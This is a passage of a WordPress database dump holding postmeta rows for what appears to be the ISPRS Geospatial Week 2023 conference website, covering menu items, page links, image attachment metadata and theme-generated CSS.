(5557,2346,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(5558,2346,'_menu_item_xfn',''),
(5559,2346,'_menu_item_url','https://www.isprs.org/'),
(5561,2082,'_wp_old_date','2022-10-05'),
(5562,2083,'_wp_old_date','2022-10-05'),
(5563,2084,'_wp_old_date','2022-10-05'),
(5564,2281,'_wp_old_date','2022-10-05'),
(5565,2282,'_wp_old_date','2022-10-05'),
(5566,2283,'_wp_old_date','2022-10-05'),
(5567,2284,'_wp_old_date','2022-10-05'),
(5568,2285,'_wp_old_date','2022-10-05'),
(5569,2286,'_wp_old_date','2022-10-05'),
(5579,2346,'_menu_item_the7_mega_menu_settings','a:21:{s:19:\"menu-item-icon-type\";s:4:\"none\";s:15:\"menu-item-image\";a:2:{i:0;s:0:\"\";i:1;i:0;}s:14:\"menu-item-icon\";s:0:\"\";s:24:\"menu-item-image-position\";s:4:\"left\";s:20:\"menu-item-image-size\";s:9:\"50px 50px\";s:29:\"menu-item-image-border-radius\";s:3:\"0px\";s:23:\"menu-item-image-padding\";s:15:\"0px 6px 0px 0px\";s:29:\"menu-item-hide-icon-on-mobile\";s:3:\"off\";s:19:\"menu-item-icon-html\";s:0:\"\";s:19:\"mega-menu-elementor\";s:3:\"off\";s:34:\"mega-menu-elementor-mobile-content\";s:0:\"\";s:9:\"mega-menu\";s:3:\"off\";s:19:\"mega-menu-fullwidth\";s:3:\"off\";s:17:\"mega-menu-columns\";s:1:\"3\";s:20:\"mega-menu-hide-title\";s:3:\"off\";s:21:\"mega-menu-remove-link\";s:3:\"off\";s:23:\"mega-menu-start-new-row\";s:3:\"off\";s:26:\"mega-menu-start-new-column\";s:3:\"off\";s:17:\"mega-menu-widgets\";s:4:\"none\";s:25:\"mega-menu-widgets-padding\";s:15:\"0px 6px 0px 0px\";s:24:\"mega-menu-hide-on-mobile\";s:3:\"off\";}'),
(5580,2348,'_menu_item_type','custom'),
(5581,2348,'_menu_item_menu_item_parent','2083'),
(5582,2348,'_menu_item_object_id','2348'),
(5583,2348,'_menu_item_object','custom'),
(5584,2348,'_menu_item_target',''),
(5585,2348,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(5586,2348,'_menu_item_xfn',''),
(5587,2348,'_menu_item_url','https://gsw2023.com/index.php/the-isprs-geospatial-week-gsw/'),
(5589,2349,'_menu_item_type','custom'),
(5590,2349,'_menu_item_menu_item_parent','2083'),
(5591,2349,'_menu_item_object_id','2349'),
(5592,2349,'_menu_item_object','custom'),
(5593,2349,'_menu_item_target','_blank'),
(5594,2349,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(5595,2349,'_menu_item_xfn',''),
(5596,2349,'_menu_item_url','https://aast.edu/en/'),
(5598,2350,'_menu_item_type','custom'),
(5599,2350,'_menu_item_menu_item_parent','2083'),
(5600,2350,'_menu_item_object_id','2350'),
(5601,2350,'_menu_item_object','custom'),
(5602,2350,'_menu_item_target',''),
(5603,2350,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(5604,2350,'_menu_item_xfn',''),
(5605,2350,'_menu_item_url',''),
(5607,2351,'_menu_item_type','custom'),
(5608,2351,'_menu_item_menu_item_parent','2083'),
(5609,2351,'_menu_item_object_id','2351'),
(5610,2351,'_menu_item_object','custom'),
(5611,2351,'_menu_item_target',''),
(5612,2351,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(5613,2351,'_menu_item_xfn',''),
(5614,2351,'_menu_item_url',''),
(5616,2352,'_menu_item_type','custom'),
(5617,2352,'_menu_item_menu_item_parent','2084'),
(5618,2352,'_menu_item_object_id','2352'),
(5619,2352,'_menu_item_object','custom'),
(5620,2352,'_menu_item_target',''),
(5621,2352,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(5622,2352,'_menu_item_xfn',''),
(5623,2352,'_menu_item_url','https://gsw2023.com/index.php/Preliminary%20Program/'),
(5625,2353,'_menu_item_type','custom'),
(5626,2353,'_menu_item_menu_item_parent','2281'),
(5627,2353,'_menu_item_object_id','2353'),
(5628,2353,'_menu_item_object','custom'),
(5629,2353,'_menu_item_target',''),
(5630,2353,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(5631,2353,'_menu_item_xfn',''),
(5632,2353,'_menu_item_url','https://gsw2023.com/index.php/important-dates/'),
(5634,2354,'_menu_item_type','custom'),
(5635,2354,'_menu_item_menu_item_parent','2281'),
(5636,2354,'_menu_item_object_id','2354'),
(5637,2354,'_menu_item_object','custom'),
(5638,2354,'_menu_item_target',''),
(5639,2354,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(5640,2354,'_menu_item_xfn',''),
(5641,2354,'_menu_item_url','https://gsw2023.com/index.php/registration/'),
(5643,2355,'_menu_item_type','custom'),
(5644,2355,'_menu_item_menu_item_parent','2281'),
(5645,2355,'_menu_item_object_id','2355'),
(5646,2355,'_menu_item_object','custom'),
(5647,2355,'_menu_item_target',''),
(5648,2355,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(5649,2355,'_menu_item_xfn',''),
(5650,2355,'_menu_item_url','https://gsw2023.com/index.php/submit/'),
(5652,2356,'_menu_item_type','custom'),
(5653,2356,'_menu_item_menu_item_parent','2285'),
(5654,2356,'_menu_item_object_id','2356'),
(5655,2356,'_menu_item_object','custom'),
(5656,2356,'_menu_item_target',''),
(5657,2356,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(5658,2356,'_menu_item_xfn',''),
(5659,2356,'_menu_item_url','https://gsw2023.com/index.php/travel-to-egypt/'),
(5661,2357,'_menu_item_type','custom'),
(5662,2357,'_menu_item_menu_item_parent','2285'),
(5663,2357,'_menu_item_object_id','2357'),
(5664,2357,'_menu_item_object','custom'),
(5665,2357,'_menu_item_target',''),
(5666,2357,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(5667,2357,'_menu_item_xfn',''),
(5668,2357,'_menu_item_url','https://gsw2023.com/index.php/gsw2023-venue/'),
(5670,2358,'_menu_item_type','custom'),
(5671,2358,'_menu_item_menu_item_parent','2285'),
(5672,2358,'_menu_item_object_id','2358'),
(5673,2358,'_menu_item_object','custom'),
(5674,2358,'_menu_item_target',''),
(5675,2358,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(5676,2358,'_menu_item_xfn',''),
(5677,2358,'_menu_item_url','https://gsw2023.com/index.php/hotel-accommodation/'),
(5679,2359,'_menu_item_type','custom'),
(5680,2359,'_menu_item_menu_item_parent','2285'),
(5681,2359,'_menu_item_object_id','2359'),
(5682,2359,'_menu_item_object','custom'),
(5683,2359,'_menu_item_target',''),
(5684,2359,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(5685,2359,'_menu_item_xfn',''),
(5686,2359,'_menu_item_url',''),
(5688,2360,'_wp_page_template','default'),
(5689,2360,'_elementor_edit_mode','builder'),
(5690,2360,'_elementor_template_type','wp-page'),
(5691,2360,'_elementor_version','3.7.8'),
(5693,53,'_edit_lock','1687707543:4'),
(5697,2362,'_wpb_shortcodes_custom_css','.vc_custom_1529513148816{padding-top: 70px !important;padding-bottom: 30px !important;}.vc_custom_1491746397816{padding-bottom: 50px !important;}.vc_custom_1491746388981{padding-bottom: 50px !important;}.vc_custom_1665134033521{padding-bottom: 30px !important;}.vc_custom_1529940944228{padding-bottom: 20px !important;}.vc_custom_1529940883052{padding-bottom: 20px !important;}'),
(5698,53,'_dt_page_overrides_right_margin',''),
(5699,53,'_dt_page_overrides_left_margin',''),
(5700,53,'_dt_mobile_page_padding_right',''),
(5701,53,'_dt_mobile_page_padding_left',''),
(5702,53,'_dt_microsite_primary_menu',''),
(5703,53,'_dt_microsite_split_left_menu',''),
(5704,53,'_dt_microsite_split_right_menu',''),
(5705,53,'_dt_microsite_mobile_menu',''),
(5707,2363,'_wp_attached_file','2022/10/map1-e1665102314135.jpg'),
(5708,2363,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:200;s:6:\"height\";i:214;s:4:\"file\";s:31:\"2022/10/map1-e1665102314135.jpg\";s:8:\"filesize\";i:487397;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"map1-280x300.jpg\";s:5:\"width\";i:280;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19828;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:31:\"map1-e1665102314135-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6177;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5709,2363,'_edit_lock','1665102258:1'),
(5710,2363,'_wp_attachment_backup_sizes','a:3:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:758;s:6:\"height\";i:811;s:4:\"file\";s:8:\"map1.jpg\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:16:\"map1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6673;}s:11:\"medium-orig\";a:5:{s:4:\"file\";s:16:\"map1-280x300.jpg\";s:5:\"width\";i:280;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19828;}}'),
(5711,2363,'_edit_last','1'),
(5712,2363,'_wp_page_template','default'),
(5713,2363,'dt-video-url',''),
(5714,2363,'dt-img-link',''),
(5715,2363,'dt-img-hide-title','0'),
(5716,2364,'_wp_attached_file','2022/10/map2.jpg'),
(5717,2364,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:200;s:6:\"height\";i:214;s:4:\"file\";s:16:\"2022/10/map2.jpg\";s:8:\"filesize\";i:71127;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"map2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6314;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(5718,2365,'_wpb_shortcodes_custom_css','.vc_custom_1529513148816{padding-top: 70px !important;padding-bottom: 30px !important;}.vc_custom_1491746397816{padding-bottom: 50px !important;}.vc_custom_1491746388981{padding-bottom: 50px !important;}.vc_custom_1665134660461{padding-bottom: 30px !important;}.vc_custom_1529940944228{padding-bottom: 20px !important;}.vc_custom_1529940883052{padding-bottom: 20px !important;}'),
(5720,2366,'_wpb_shortcodes_custom_css','.vc_custom_1529513148816{padding-top: 70px !important;padding-bottom: 30px !important;}.vc_custom_1491746397816{padding-bottom: 50px !important;}.vc_custom_1491746388981{padding-bottom: 50px !important;}.vc_custom_1665134722899{padding-bottom: 30px !important;}.vc_custom_1529940944228{padding-bottom: 20px !important;}.vc_custom_1529940883052{padding-bottom: 20px !important;}'),
(5722,2367,'_wpb_shortcodes_custom_css','.vc_custom_1529513148816{padding-top: 70px !important;padding-bottom: 30px !important;}.vc_custom_1491746397816{padding-bottom: 50px !important;}.vc_custom_1491746388981{padding-bottom: 50px !important;}.vc_custom_1665134722899{padding-bottom: 30px !important;}.vc_custom_1665135195655{padding-bottom: 20px !important;}.vc_custom_1665135234836{padding-bottom: 20px !important;}'),
(5723,2368,'_wp_page_template','default'),
(5724,2368,'_elementor_edit_mode','builder'),
(5725,2368,'_elementor_template_type','wp-page'),
(5726,2368,'_elementor_version','3.7.8'),
(5729,2082,'_wp_old_date','2022-10-06'),
(5730,2083,'_wp_old_date','2022-10-06'),
(5731,2346,'_wp_old_date','2022-10-06'),
(5732,2348,'_wp_old_date','2022-10-06'),
(5733,2349,'_wp_old_date','2022-10-06'),
(5734,2350,'_wp_old_date','2022-10-06'),
(5735,2351,'_wp_old_date','2022-10-06'),
(5736,2084,'_wp_old_date','2022-10-06'),
(5737,2352,'_wp_old_date','2022-10-06'),
(5738,2281,'_wp_old_date','2022-10-06'),
(5739,2353,'_wp_old_date','2022-10-06'),
(5740,2354,'_wp_old_date','2022-10-06'),
(5741,2355,'_wp_old_date','2022-10-06'),
(5742,2282,'_wp_old_date','2022-10-06'),
(5743,2283,'_wp_old_date','2022-10-06'),
(5744,2284,'_wp_old_date','2022-10-06'),
(5745,2285,'_wp_old_date','2022-10-06'),
(5746,2356,'_wp_old_date','2022-10-06'),
(5747,2357,'_wp_old_date','2022-10-06'),
(5748,2359,'_wp_old_date','2022-10-06'),
(5749,2358,'_wp_old_date','2022-10-06'),
(5750,2286,'_wp_old_date','2022-10-06'),
(5812,2372,'the7_shortcodes_dynamic_css','a:1:{s:32:\"7fd6db3d6608e1a162a1c50b88305d0a\";s:14801:\".portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.content-bg-on.classic-layout-list article {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.dividers-on.classic-layout-list article {\n  padding-top: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.hover-scale article:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.gradient-overlay-layout-list article {\n  border-radius: 0px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .post-thumbnail-wrap {\n  padding: 20px 20px 0px 20px;\n  border-radius: 0px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .post-thumbnail-wrap *,\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .post-thumbnail-rollover:after {\n  border-radius: 0px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.bottom-overlap-layout-list.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.dt-icon-border-on.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .project-links-container a:before {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-hover-border-on.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .project-links-container a:after {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-bg-on.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.dt-icon-hover-off.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .project-links-container a > span,\n.dt-icon-hover-off.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.dt-icon-hover-on.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .entry-title,\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-size: 22px;\n  line-height: 32px;\n  font-weight: bold;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .entry-meta {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .entry-excerpt {\n  margin-bottom: 5px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a:not(.centered-layout-list) .post-entry-content {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 0px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .post-thumbnail-wrap,\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .post-details.details-type-link {\n    margin-bottom: 2px;\n  }\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 0px;\n}\n@media screen and (max-width: 1199px) {\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid .double-width {\n    grid-column: span 1;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid 